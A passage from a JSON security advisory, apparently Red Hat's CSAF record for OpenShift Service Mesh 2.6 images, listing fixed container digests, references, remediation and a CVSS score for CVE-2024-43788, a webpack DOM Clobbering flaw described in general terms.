"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "curl: libcurl: ASN.1 date parser overread"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
